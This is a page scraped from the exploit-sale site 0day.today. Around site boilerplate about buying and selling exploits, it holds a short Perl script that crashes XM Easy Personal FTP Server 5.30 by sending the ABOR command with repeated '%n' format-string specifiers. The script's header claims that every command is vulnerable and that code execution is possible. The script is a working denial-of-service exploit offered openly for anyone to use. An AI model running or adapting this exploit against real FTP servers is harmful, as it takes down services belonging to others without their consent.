0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit
================================================================= XM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit ================================================================= #!/usr/bin/perl -w #========================================================================================================= # XM Easy Personal FTP Server 5.3.0 Multiple vulnerabilities # By Umesh Wanve #========================================================================================================= # # Vendor: http://www.dxm2008.com/ # # Date: 28-02-2007 # # # 1) Multiple format string attacks. Every command is vulnerable. # With only single % also the server crashes. # # 2) Multiple buffer overflow occurs in commands if we fuzz the server( Better way use ur own fuzzer) # # # Code execution is possbile. # This is latest version of FTP server. # # ########################################################################################### use Net::FTP; (($target = $ARGV[0])) || die "usage:$0 <target> <port>"; my $user = "test"; my $pass = "test"; $exploit_string = "%n" x 10; print ":: Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!"; print "Connected!\n"; $ftp->login($user, $pass) || die "could not login: $!"; print "Logged in!\n"; $ftp->command("ABOR ",$exploit_string); # Every command is vulnerable. Use it what u like :) print "Done!\n"; $ftp->quit; # 0day.today [2024-12-25] #